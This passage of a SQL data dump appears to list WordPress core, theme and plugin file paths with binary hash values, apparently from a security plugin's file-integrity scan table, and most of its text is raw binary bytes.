�q?�e�h','wp-content/themes/regina-lite/layout/images/home/testimonial-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/:�E���b�|','u�\0\'_G�-����֛DIy�9�-����v$�','',0,'?'),('L<#���\Z����}','wp-includes/js/tinymce/skins/lightgray/img/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9K���M�:�Tf�9','��;���T��O`(6��,�sk�Z���c�R��+','',0,'?'),('L#�Ǜ��z��=~�x�','wp-content/themes/advance/inc/kirki/assets/js/controls/radio-buttonset.js',0,'�0{�I��y���-��1','�0{�I��y���-��1','��pǻ�_o�y���`(.�g��\\�B���,','',0,'?'),('L#��/۰*�3���\r','wp-admin/includes/class-wp-terms-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0Up�\0�.c*�a�','\'�]pn������v�\r>A���;¯P \Z(-��','',0,'?'),('L(��n�9[2�C6�','wp-includes/js/zxcvbn-async.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��\nO\\��Y�b','��\'FP�\Z�/G\n��J����\\B��\Z��IT�','',0,'?'),('L<K5G��Sq�Tz��','wp-content/themes/weblog/acmethemes/customizer/customizer-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F�1|�k�\nR[�','Qi[�X\\�h��`kM5�,0�U����M��M\0','',0,'?'),('LC�g=��7���Ϸ��','wp-content/plugins/redirection/models/match.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��SNyY{H�Q','��zvr/i\0����#�����^R��`���','',0,'?'),('LR7Q��ToG|�{','wp-content/plugins/wordfence/lib/viewFullActivityLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�>��&Q)�Fy�k','e�i�p��r9ݴZ\\�\\Q~`�?�7�=�R�','',0,'?'),('L]�\'���B=-��\"H','wp-content/themes/doctors/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nn��mM�6��0A�|','Y�2xK�3���V�m�(�g�����O�H*U','',0,'?'),('Lap���8g�V�,��g�','wp-includes/js/dist/vendor/react-dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��InV��9����','LrJ�#��6h����\r�ȴD�R5��b:uM','',0,'?'),('LsЇś\n�c}>�K��','wp-includes/css/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`b�L֏�Uy�/','��\r�~�W$A�\"ac�����G<��HZ<�8`','',0,'?'),('Lw+��$�4|�ns�w','wp-content/themes/twentynineteen/template-parts/content/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��+�����zg��','@u� |-�\ZK\Zbk�^��R4hM�Ψ����','',0,'?'),('Lz����Z��#�<','wp-includes/class-wp-locale-switcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�?�F�w,�T��','!@�B��<6�ꁒ�Ku��Pm=��+�/c_�','',0,'?'),('L���[�����k(\'�','wp-content/themes/regina-lite/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�������}�+�','�\0��m�m�-��实ё��]��㢾1�6I','',0,'?'),('L����>��Z�d','wp-content/themes/regina-lite/layout/images/controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڳ/j�~����yea^','��pq55�d\0e?���K���pJ���V��W�','',0,'?'),('L��e�t\"pc( �e�','wp-includes/wp-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yAS9�ie��P�','����I�&���e�*��7�K38�����','',0,'?'),('L�\r�%��{��','wp-includes/blocks/social-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�&X�@�$>y�@�','�#V�b��v����E\Z\Z6�妅Y9l�\"�s�','',0,'?'),('L�\r��Ȧ:��n�h\'','wp-content/plugins/akismet/_inc/akismet.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�s��r�\n�c�J(','����ra�H�\n��}`�R��N��|���:G','',0,'?'),('L+q�V�;�h��Y�','wp-includes/fonts/dashicons.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M���N:��\'�ʤ��ȹ','J��!�����XLl`�e��O��s�H����','',0,'?'),('L�>t���N�����','wp-admin/css/colors/blue/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5Iה�g,)Z�YM�','�\\k��S�뚑�n wW�� �!�*�~�v��','',0,'?'),('L��)��a$�D-�Ӯ�J','wp-includes/js/tinymce/plugins/wplink/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��3���ܖ3��M','z�N\'A�%�S��@4�U���BD���q����','',0,'?'),('Mx1NjTm�R_2o','wp-content/plugins/wordfence/views/dashboard/global-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˫\'�m�`�0>�+#��','���������p������Pv?Z�F��QQcj','',0,'?'),('M�CـB �g\r����t','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-switch-control.php',0,'>jL�1�K��r ��X','>jL�1�K��r ��X','\n�,���xb�9dk���QK�x�G�2���','',0,'?'),('M1��/�n��̖Q��','wp-includes/css/dist/components/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��`=\"����y�)','�xp�3�>9eQ<�jCQ���g@M�/�w','',0,'?'),('M?,5�*�����K*�f','wp-admin/js/post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tm�{$,����','A�Y����}�U=��2��\'\Z�� �Z�0�<�','',0,'?'),('MK�0W&Vxu%Z�=c�','wp-content/themes/healing-touch/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-U��aO1���','jV�S�_{�el�%��cm?�}�ŗ�0�w8�','',0,'?'),('MW� ���:��ي','wp-admin/images/align-none.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eqd2���u����\r','�g(�1�X�{� [].���T����A��','',0,'?'),('MY��G��\\tX����/','wp-includes/customize/class-wp-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��S?��|��G','h �3|:Q9z���4Y1[�{^� $;�#�q��','',0,'?'),('M|o;$d�Mr�#�','wp-content/themes/weblog/assets/js/weblog-custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���gv�w�[f� Ŝ�','Q�?�����퐲�a�������]H��\\n\nI','',0,'?'),('M�[\Z�2hT� �K�','wp-content/plugins/wp-cerber/assets/flags/tr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<~Qk�dIr&��-!','�\"��i0�M��˩��VJc���]�3�\n��[','',0,'?'),('M���]�Oێ����!R','wp-content/themes/regina-lite/sections/section-home-our-team.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��\r�}�����<�','4��XS\"lh�ܹ`��C�?���aT����˾1','',0,'?'),('MР\0�A���9Q�+��','wp-includes/js/admin-bar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�၈��n�&�a1a\0','(L��<����K�i�-��U4�Wܸ` ��rl$�','',0,'?'),('M�;C�����8Yyﲏ','wp-includes/js/twemoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���װ�aL/S��T','e�dimԺm\Z$V��v�% ���FO��aK\rŇS','',0,'?'),('M���(pѤ���$?G','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/color-picker.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�����e%���{*f','�B�j��B1m���ѐ�@�������@%','',0,'?'),('M��w�M�f�0�b\\�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�+>����*�A��ř�','����{��Z�>�1k||�}P���C�TC��A','',0,'?'),('M���I�M��rD��-','wp-includes/post-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a^E�@�p�\'��?�','N�O�[wȐ�� ��&Ќ�!P��Qe��s','',0,'?'),('N7�A�\0�nnV�֑�','wp-content/plugins/wordfence/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��G\r�6|\'','��y~`w(j�~�=뤼&��ݴ���Q>`^�x','',0,'?'),('N=�f�>$K���H�T�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?�G{�����g','ĀР<W�;-\Z��(C+�,M���U��W6','',0,'?'),('Nc\"H 7�i�h\"�F�','wp-content/themes/healthcare/css/font-awesome/scss/_list.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�9(\'_�B-�','l���%�����xPXX#�5�M/�*l���','',0,'?'),('Nh�������\n�%','wp-content/themes/weblog/acmethemes/customizer/sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�t�T����h\"��','J�4��,Ģ��_��u�\'��K���Qʷ��,','',0,'?'),('Ni�~ �`���W�E','wp-content/plugins/wordfence/lib/wfAlerts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�(A��|�ϯy��L','�\'_�;?�|US5d}K/+,I!|��t','',0,'?'),('Nxa�߭�̿��(r�_','wp-content/plugins/all-in-one-wp-security-and-firewall/backups/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('N|�Jв�zn�sw','wp-includes/pluggable-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���\"�j��2�ߖ','��U����=����co��=t1�-\\�\r�=','',0,'?'),('N���W[��@��t)�','wp-content/plugins/wordfence/css/iptraf.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�bf.��\n�V[�xPh','J��-@ ]�-�� �cq���WQ$8�','',0,'?'),('N�3�j@pu5����^��','wp-includes/js/tinymce/skins/wordpress/images/more.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\nm\0;�˫�z','$��v��o^���U� �A\0���:�\\C�u��','',0,'?'),('N��HV����}�4G','wp-admin/css/customize-widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�\"?.�i�!�qe�o�','ߟ�d��~o�K�C��ѰE��˛)5��.9�A','',0,'?'),('N��lI���V�,�Z�','wp-content/plugins/wp-cerber/assets/flags/hn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;Ҿ����:��','e��{9�[�۫�p��Nk83)t����$<5�','',0,'?'),('N��a��e]�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3de{�h��|@��ձ','��BX����V�AӋ6�4���/Mk��f�','',0,'?'),('O ��S����#�Yi�v','wp-admin/includes/class-wp-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!T<zs�6�C�?r\r�','�hŽ�[��в�u�\0Jh=�$�6L)c^f��zb��','',0,'?'),('O�ҽPT�^�4~��B','wp-includes/css/dist/editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k����`�\0d���','�2��*Pj%R4{?��M�rH�:�����b�~','',0,'?'),('O =(�:��<� �1F�','wp-includes/class-wp-feed-cache-transient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��?^>��O�',':��;h�!xE�z��P+�dV�0����D�','',0,'?'),('O+���[�IB���m�m\'','wp-content/plugins/wordfence/images/wf-central-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�(��VѤ���','\0{\r�ߘ�J/� �^�+��,��S������','',0,'?'),('O4�dzWQ�\0��R��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Lj���\"C�ix���','��x眪!����}�\Z�����W����d','',0,'?'),('O=��h�\0}O��rL�b','wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�U��~�L5�@\ZVU','/�r��T�rm����G�с�\r�%�e\r��|�[','',0,'?'),('OBo�fr�SA�:q��-7','wp-content/themes/skt-toothy/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mx�֖γa���p��$E','1$�� �K��+����������)��k�xh�','',0,'?'),('OJ�?�Cz�V�^2���1','wp-content/plugins/wp-cerber/assets/flags/mr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��Y��kF���@','���c���n�foaYd��M@�0O��DI\n��x','',0,'?'),('OS�Y�Wz!8�ʣj�','wp-content/plugins/wordfence/views/gdpr/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\atn}#��\r��','ÝE��F�@kh��V�b��w6��~�#kC','',0,'?'),('OT���;�h�FR|�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-maintenance-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;I�U`��t���',';�9�sM�lȴ[\ZZY��B�����{��Re','',0,'?'),('OlqCcێ���������','wp-admin/css/forms-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�`�����kث=','g��<�������ƃ˂�s��{5Ϝq��6�','',0,'?'),('Oy�}Ma���_��I','wp-includes/Requests/Exception/HTTP/504.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�̪Db� ��*�','�<����!B�|$k���݈�# �e�i%0','',0,'?'),('O�潼m$��&_','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�F��\n�D��ҭ�','2\"�ޡ�4e���Kӗ�p!w#�����1���,','',0,'?'),('O��\\���P5��{�R�','wp-admin/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9=�C���;��w^�X','�_\n�W����o�0w�����7��`=�r��','',0,'?'),('O�[0{�ë ��/�¼','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')e��f�#�`P�~7�n','-m��z��n�N�F�E\0ѭ\\vq�sL?�Z\Z��','',0,'?'),('O����&�r�蓏�� ','wp-admin/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\"�\Z���&T;�ݫ��','c�tg�H���u����L=?q�u���EA','',0,'?'),('O����R�r����D�?�','wp-admin/js/postbox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���J��z%p','�qG%`�3E�:j~^�\ZҌ��;,��','',0,'?'),('O�� ���EW�f�n�','wp-content/themes/wp-barrister/library/js/jquery.cycle2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_,ڗ.��D�R�;�o','�=-��q|����k放3\\��y}rM��L','',0,'?'),('O����y ��k b�','wp-admin/css/customize-nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lU�e�H�Y%U�n��','AK希T�YL�6��~8����w,9�ˉ+�R�f','',0,'?'),('O�����HI!K!0[�','wp-content/plugins/wordfence/lib/menu_scanner_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�����D�X�;�I','���C�&YB�p_d$�,+������Ŝ���J��','',0,'?'),('O�5e���;hz�w@�W','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z<����{~G�f(','��,ב[\Z���@�+���?x���P��А�','',0,'?'),('O��O�M_K7�n��','wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*5���^gG�o<NN','5�\'4ϣ�j3Ò�NjX�CU�!�����]~','',0,'?'),('O�hu�G���&\0�L�','wp-includes/Text/Diff/Engine/native.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S���\r��$�T','S��\04�v@�ű`�DG V�u�e�R��B竇3�','',0,'?'),('P��H��Z`�=���','wp-includes/blocks/pullquote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�1��ݗz��sK�c','v�K�N��`\ZX�n$`7P��Y6�~ON�1�','',0,'?'),('P�bw�=����i��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\Z��Iw5AlLۢ�','��K{�8��fl��7s�Rh���嗋��I','',0,'?'),('P�/:��̮�҉���H','wp-content/plugins/wordfence/waf/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�З:4�z��M�E�7�','�!8�s���w�#�)��\r�<�r|2y*LS^','',0,'?'),('PE۫�7r|oI�6��>','wp-includes/js/backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`ft7\\J�*��4a','j�˯�}j�$��@�č��� n%Q|�l��','',0,'?'),('P ���NtD��n\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��!�,��^�q�','X߇p�Ք�Z��Љ�ֱo�\r�=˸<!�~�3�','',0,'?'),('P&_#�\'�zT���s','wp-includes/Requests/Exception/HTTP/417.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bpj�hO^�c\\G #','���L�T��Ҙ$xDs�^�h_!kC�\"1\'��_�','',0,'?'),('P\'�(���?+�z��$�','wp-admin/js/postbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$;�9H�S_��7���','��`���R���f!Rd�<����Q�� ��GIJ','',0,'?'),('P73o� ��\0�=��','wp-admin/js/word-count.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rffB)��������','��6j�,A�ުǭs�D��eC�z�&���\n���','',0,'?'),('PJ�~]��; ��`y','wp-includes/widgets/class-wp-widget-media-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dCa�*C^e~OriA�','�L�/�T|����w�pEf1�Ln��!y���','',0,'?'),('PK��2�I��)��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[�h�k�da4�p','�&�!�7^�@��9���N�BT�����*8�','',0,'?'),('Py/bj[�4��V���e','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-number.php',0,'��7�*@#gd}�?�b','��7�*@#gd}�?�b','�c�j�.\n�g�~�G���ŏDz�`n�=','',0,'?'),('P��[�D�XP��a���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;u�S���l','�M>:\r�&�V��`�\Z:�O0�Sv;\0��V�w','',0,'?'),('P��iz�t�a�}�a','wp-admin/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\\���@�ju��W�=','�%Z��j��\Za��� ��Dy��b����','',0,'?'),('P���Y�.U�<�','wp-content/themes/regina-lite/inc/customizer/class-regina-lite-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZAM�ܢLD��i�/?�','������,���njs|�� ��������B�,','',0,'?'),('P��\n�e���u�\"�','wp-includes/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AG�\Zˢ;�������l','�D^�Y���\n�����%P+�0��[�x�~��','',0,'?'),('P��y����Xn��','wp-content/plugins/wp-cerber/assets/flags/an.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B����\ZEs�F\r�8','���Z��iLz�q`�{ۯۇn �fN�zY3i�','',0,'?'),('P�a�l&��:�)V�I�','wp-content/plugins/wp-cerber/assets/flags/ax.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l���ho��%>��T�','Ku*Q(�g�iC�`i0�����ȇ�R.�c���','',0,'?'),('P�@���;b<\n�c�','wp-includes/class-wp-oembed-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\";�r��\Z(FAU','�p���[����j$8�7�zI\\�!y�<G�4\r���','',0,'?'),('P�M�\Z�I̸�ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Euƻ\\S w?,�_�L`','��� ��i�Lƛw���6�_���,n�2S��Zh)','',0,'?'),('P�1$���\\*�C','wp-admin/images/stars-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���#�S�Me.^','[��耿�_(\rh���Y���T��qZ��','',0,'?'),('P��0��a��R�z= ','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�gkeͿݾ���|�h','�H��zj鞨%�����p=�Z��iNA�Z�','',0,'?'),('Q;���(����Mp*�','wp-admin/js/widgets/media-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PQ�{���97@�]տ','PP&`@�U��}�{�������_V��,HCV','',0,'?'),('QJ���s3�R�aU*�s','wp-content/themes/twentynineteen/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���հ&��Tgs\r','0�ed ��s��X������Q8���3�Z��','',0,'?'),('QT���*�f�P��.�','wp-admin/includes/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Հѷ������#','+B�0j$2f�j�i�\Z���)HٗO=�\\%�','',0,'?'),('QY��1�Tl��Vr<','wp-includes/js/customize-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),('Q`�̈$l�$�}\rJ)','wp-content/themes/doctors/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0���j�S�4���','wq 4u~���G�NǦR8hxt�K0�oC','',0,'?'),('QuoPX��\0��Sڞ','wp-admin/images/bubble_bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�g<ć�I����0','\'+u�W�`-A�����S\'�}S~S��b���','',0,'?'),('Qwa��t%F�%2��','wp-content/themes/twentytwenty/templates/template-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[6i\"Y|���f8K','Hh�E�.P�ڬ�.��M��eMo�@\0��W�','',0,'?'),('Q��cm�uX\Z3�B+��X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VD�\'\'���C��b�x','fkYQ@Y�^,\n�?�J�Y���\0�C�ł��','',0,'?'),('Q����\n�L����\'�','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-spacing-control.php',0,'s�FR�ǘ���R�.M','s�FR�ǘ���R�.M','���Y`^��j���4�8���[R���K}2��','',0,'?'),('Q�t��$oGoE�$�:�','wp-content/plugins/wp-cerber/assets/flags/sy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oi�&\0�0$l6��','�/<7�\n�W�6�H~�G�K \"�L���','',0,'?'),('Q��6K4������H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bv�J�Y|���O[k��','R\r��½]����(%^V�z �hSG�LSO�','',0,'?'),('Q��-�C-]C����','wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����O�����81','���v$�͏���,��5�6X�~Xʧ��ℐ���','',0,'?'),('Q�`���8�M�8','wp-admin/press-this.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'xq��>�/���EQ�L','>��k�(���B�������h\\�ѫ͜:','',0,'?'),('Q����P��5U\n]��Ż','wp-content/themes/regina-lite/layout/css/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.~�BleD�&����x','I��A��5x�e��E�����f<T����c','',0,'?'),('Q�Y�Qf�7�@2xC','wp-content/themes/twentynineteen/images/pattern_02.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ߢБ^N\0�[1#U','OH[�Byj��[�#��A縬8Ė�_7 r�','',0,'?'),('Q�.ì�\\���XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','դ��q�.�\rl4G�','�˾�6�/(���OE||\'�郊�$emԬ!�','',0,'?'),('Q�����l��g�-��','wp-admin/js/comment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ur�|,:]�_��#','d\0��\\w�| ��w��W?�3 gYaX~]�-�','',0,'?'),('R�v5��W6�`�ھ�','wp-includes/css/dist/nux/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cڷ�\r�\\Kn]\nO�','h��iu���E���UJc]���\\d`M\Zqi �սq','',0,'?'),('Rb{����*͆�(��','wp-content/themes/advance/inc/kirki/includes/class-kirki-panel.php',0,'�^:�NU{x�\n�n���I','�^:�NU{x�\n�n���I','�a[a4����\r�8p�Cy\Z8�{�JΫX����','',0,'?'),('R3�Us�3��}T��','wp-includes/js/autosave.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0|w{���5l�D\nө��','����U��m�����vk�}�n��V�#IH�','',0,'?'),('RQ�b7f�� |~ۓ�(','wp-admin/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S|�^�p9Y\\\re*.�2',',/;�{�M,��z���+��o{�c�|u��b\"_Q','',0,'?'),('Ra��ce��JT�','wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3I�w>��A�\n�','������F��\0O�.Qm+v�Hj�E�odFX�','',0,'?'),('Rj�q�Iӏ\Z�Y&�','wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ăd��O�[�S\nc\0','^o�&[�l����2Zg/�?>��P~C��Iȗ','',0,'?'),('Rmj���\\X����ָQ�','wp-content/plugins/wordfence/css/wf-font-awesome.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��M��ً�V���:','997dI�Ou�-����%enԻ�1�����I','',0,'?'),('R�b�:Z�K��L�','wp-admin/js/application-passwords.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nv�>4��~,�aڛ858','�\ZKok����ӗi0˓���RI��c\0�Oh','',0,'?'),('R�x�4Mp@�9u\n֊ p','wp-includes/images/wpspin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('R��|Rx/�bzn9\0*�J','wp-admin/includes/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L����S�0���','S[��n��+��C�w�C�쌑�)n�d','',0,'?'),('R�\\SC�|ju�9��A','wp-includes/js/media-grid.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BN5�d��b�i^&ޖn','��$�#�& v��PS�u{Z�)XÜ����ֱ�','',0,'?'),('R��ŋ0���;z��<�','wp-content/themes/regina-lite/layout/js/plugins/navigation/navigation.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��9�\'R�lzæ','H�8�2Х��)�@3�F@w)��@#?�K','',0,'?'),('R¥�����Le�q �&�','wp-admin/js/user-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Za�K�=���l�s�','�>�n�\"S����q��t�\"qz��ي�*pZ#�+x','',0,'?'),('R�H\r0��!�d�?c&','wp-includes/widgets/class-wp-widget-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bb��w�8�[�&�-Y','�@�Ѩ��pw�x�QX��}\r�y��|��?��','',0,'?'),('S.FȫA�j���(�:','wp-includes/js/hoverIntent.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�m���\n8�� 